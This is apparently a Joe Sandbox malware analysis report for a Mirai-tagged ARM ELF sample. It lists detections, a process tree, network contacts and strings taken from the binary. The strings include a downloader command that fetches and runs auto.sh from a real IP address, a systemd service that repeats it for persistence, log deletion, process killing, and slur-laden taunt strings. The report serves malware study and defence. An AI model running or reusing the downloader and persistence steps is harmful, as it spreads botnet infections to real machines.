Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1585056
MD5:69a1790982af9b8302696a012e9fc07a
SHA1:1c4f8ae74cd4778624ea58a826dfb3c7dd33979a
SHA256:1b04a271136e186d32999cd8cb762e51c056620c4482668cd7efdb49cb6d4dbf
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585056
Start date and time:2025-01-07 01:26:53 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/4@54/0
  • VT rate limit hit for: tcpdown.suo. [malformed]
  • VT rate limit hit for: tcpdown.su|1
Command:/tmp/arm5.elf
PID:5484
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • arm5.elf (PID: 5484, Parent: 5402, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 5486, Parent: 5484)
      • arm5.elf New Fork (PID: 5488, Parent: 5486)
        • arm5.elf New Fork (PID: 5535, Parent: 5488)
        • arm5.elf New Fork (PID: 5537, Parent: 5488)
        • arm5.elf New Fork (PID: 5539, Parent: 5488)
        • arm5.elf New Fork (PID: 5545, Parent: 5488)
        • arm5.elf New Fork (PID: 5547, Parent: 5488)
        • arm5.elf New Fork (PID: 5556, Parent: 5488)
        • arm5.elf New Fork (PID: 5564, Parent: 5488)
        • arm5.elf New Fork (PID: 5566, Parent: 5488)
        • arm5.elf New Fork (PID: 5608, Parent: 5488)
        • arm5.elf New Fork (PID: 5610, Parent: 5488)
        • arm5.elf New Fork (PID: 5640, Parent: 5488)
        • arm5.elf New Fork (PID: 5643, Parent: 5488)
        • arm5.elf New Fork (PID: 5652, Parent: 5488)
        • arm5.elf New Fork (PID: 5661, Parent: 5488)
        • arm5.elf New Fork (PID: 5666, Parent: 5488)
        • arm5.elf New Fork (PID: 5671, Parent: 5488)
        • arm5.elf New Fork (PID: 5674, Parent: 5488)
        • arm5.elf New Fork (PID: 5682, Parent: 5488)
        • arm5.elf New Fork (PID: 5685, Parent: 5488)
        • arm5.elf New Fork (PID: 5697, Parent: 5488)
        • arm5.elf New Fork (PID: 5700, Parent: 5488)
        • arm5.elf New Fork (PID: 5711, Parent: 5488)
        • arm5.elf New Fork (PID: 5713, Parent: 5488)
        • arm5.elf New Fork (PID: 5722, Parent: 5488)
        • arm5.elf New Fork (PID: 5725, Parent: 5488)
        • arm5.elf New Fork (PID: 5735, Parent: 5488)
        • arm5.elf New Fork (PID: 5738, Parent: 5488)
        • arm5.elf New Fork (PID: 5750, Parent: 5488)
        • arm5.elf New Fork (PID: 5752, Parent: 5488)
        • arm5.elf New Fork (PID: 5762, Parent: 5488)
        • arm5.elf New Fork (PID: 5765, Parent: 5488)
        • arm5.elf New Fork (PID: 5773, Parent: 5488)
        • arm5.elf New Fork (PID: 5775, Parent: 5488)
        • arm5.elf New Fork (PID: 5778, Parent: 5488)
        • arm5.elf New Fork (PID: 5788, Parent: 5488)
        • arm5.elf New Fork (PID: 5796, Parent: 5488)
        • arm5.elf New Fork (PID: 5798, Parent: 5488)
        • arm5.elf New Fork (PID: 5806, Parent: 5488)
        • arm5.elf New Fork (PID: 5815, Parent: 5488)
        • arm5.elf New Fork (PID: 5818, Parent: 5488)
        • arm5.elf New Fork (PID: 5820, Parent: 5488)
        • arm5.elf New Fork (PID: 5828, Parent: 5488)
        • arm5.elf New Fork (PID: 5831, Parent: 5488)
      • arm5.elf New Fork (PID: 5490, Parent: 5486)
        • arm5.elf New Fork (PID: 5494, Parent: 5490)
      • arm5.elf New Fork (PID: 5492, Parent: 5486)
      • sh (PID: 5492, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 5496, Parent: 5492)
        • systemctl (PID: 5496, Parent: 5492, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm5.elf New Fork (PID: 5500, Parent: 5486)
      • sh (PID: 5500, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 5502, Parent: 5500)
        • systemctl (PID: 5502, Parent: 5500, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 5498, Parent: 5497)
  • snapd-env-generator (PID: 5498, Parent: 5497, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5504, Parent: 5503)
  • snapd-env-generator (PID: 5504, Parent: 5503, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 5526, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5526, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • gdm3 New Fork (PID: 5533, Parent: 1400)
  • Default (PID: 5533, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5534, Parent: 1400)
  • Default (PID: 5534, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5568, Parent: 1)
  • systemd-user-runtime-dir (PID: 5568, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm5.elfAvira: detected
Source: arm5.elfReversingLabs: Detection: 55%
Source: arm5.elfVirustotal: Detection: 56%Perma Link
Source: arm5.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm5.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: arm5.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

barindex
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.13:50380 -> 104.168.33.8:2601
Source: global trafficTCP traffic: 192.168.2.13:52438 -> 107.175.130.16:7722
Source: /tmp/arm5.elf (PID: 5484)Socket: 127.0.0.1:39123Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh
Source: arm5.elf, startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh;
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 727, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 914, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 917, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 1805, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 1884, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 2961, result: successfulJump to behavior
Source: /tmp/arm5.elf (PID: 5490)SIGKILL sent: pid: 5526, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

barindex
Source: /tmp/arm5.elf (PID: 5488)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5526)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5526)Directory: <invalid fd (8)>/..Jump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/238/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/239/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/3631/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/241/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1482/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1480/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/371/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/131/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1238/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/134/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/256/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/257/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/378/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/3413/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/1475/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/936/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/816/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5492)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/arm5.elf (PID: 5500)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 5496)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5502)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/arm5.elf (PID: 5488)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/arm5.elf (PID: 5484)File: /tmp/arm5.elfJump to behavior
Source: /tmp/arm5.elf (PID: 5484)Queries kernel information via 'uname': Jump to behavior
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: P /var/lib/vmwareQ
Source: arm5.elf, 5484.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5535.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5537.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5539.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5545.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5547.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5556.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5564.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5566.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5608.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5610.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5640.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5643.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5652.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5661.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5666.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5671.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmpBinary or memory string: /tmp/vmware-root_727-4290690966
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQ
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: /var/lib/boltd8/var/lib/vmware<
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: ,/var/lib/vmwareD
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.uRTK8R:U
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: P /var/lib/vmware/VGAuthQ
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmwareA
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQ`!
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_727-4290690966
Source: arm5.elf, 5484.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5535.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5537.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5539.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5545.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5547.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5556.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5564.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5566.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5608.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5610.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5640.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5643.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5652.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5661.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5666.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5671.1.0000558861982000.0000558861ad1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
